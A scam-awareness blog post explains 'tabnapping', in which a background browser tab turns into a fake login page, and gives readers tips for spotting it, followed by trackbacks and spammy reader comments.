Beware “Tabnapping” – a new kind of Phishing scam
Posted under: 
User Interface specialist and creative lead on Mozilla’s Firefox browser Aza Raskin has outlined a brand new variant on “phishing” attacks which he has christened “Tabnapping”.
Traditionally, “Phishing” has relied upon convincing users to click on a link in an email to take them to a fake website such as their bank, credit card issuer or email account. Once the user logs in to the fake site, their details are transmitted to the fraudster and the account is immediately compromised. Public awareness of “phishing” emails is now relatively high and most people know not to click on links in emails appearing to come from such organisations.
“Tabnapping” relies on the user believing that it is impossible for the content of a tab to change while you’re not looking. You may click on a link in Twitter, Facebook or a “sponsored link” in Google which will load a genuine webpage that delivers the content it promises. If you then click away from that site, leaving it open in a “tab” whilst viewing another website, the content of the original tab will change to a fake log-in page impersonating one of the websites you visit most often, be that Facebook, Gmail, Hotmail or your online banking account. You then scan back through your tabs and believe you’ve left the site open and have been logged out, so you log back in again.
“memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.” said Raskin, explaining how the scam works
A New Type of Phishing Attack from Aza Raskin on Vimeo.
The biggest danger of this type of attack is that it can be targetted to the websites you actually visit, or even to the ones where a current login is open. Traditional “Phishing” emails often stumble at the first hurdle by impersonating organisations or banks that you’ve never had dealings with, so you instantly know that if you don’t bank with HSBC for example, it’s a scam. A “Tabnapping” website will allow scammers to specifically target your account by harvesting your browser history to check that you actually visit the site it will impersonate.
So, how can we avoid this type of “phishing” attack?
Whenever you log in to a website, regardless of whether you already have a tab open check the URL in the address bar to make sure you’re still on the genuine website. Check especially for the Https:// at the beginning and the secure padlock in the status bar. If the URL doesn’t look right, or there’s no padlock, close the tab, open a new one and enter the URL again.
Better still, make it a policy not to leave websites that require secure logins open in tabs. That way, you’ll know if a site that requires you to log in appears in a tab, you haven’t left it there and you’ve been “Tabnapped”
[...] Beware “Tabnapping” – a new kind of Phishing scam | Scam Detectives [...]
[...] Via ZDNet UK, Computerworld, Scam Detectives [...]
[...] Beware “Tabnapping” – a new kind of Phishing scam | Scam Detectives [...]
This is such a great resource that you are providing and you give it away for free. I enjoy seeing websites that understand the value of providing a prime resource for free. I truly loved reading your post. Thanks! Brighton Flats Rent Team!
Hey dude, Steve here Keep em coming you do a fantastic job with this blog, inspiring many newbies like me cant let you know how much I appreciate whatever you do! Steve
i love your content.thank you
This is a good website!, i just recently found it and now is on my Favorites.
thanks and keep tight lines.
Great stuff from you, man. Ive read your stuff before and youre just too awesome. I love what youve got here, love what youre saying and exactly how you say it. You make it entertaining and also you still manage to ensure that it stays smart. I cant wait to read more from you. This is really a great blog.
I have to say that Im really unimpressed with this. I mean, sure, youve got some very interesting points. But this blog is just really lacking in something. Maybe its content, maybe its just the design. I dont know. But its almost like you wrote this because everybodys doing it. No passion at all.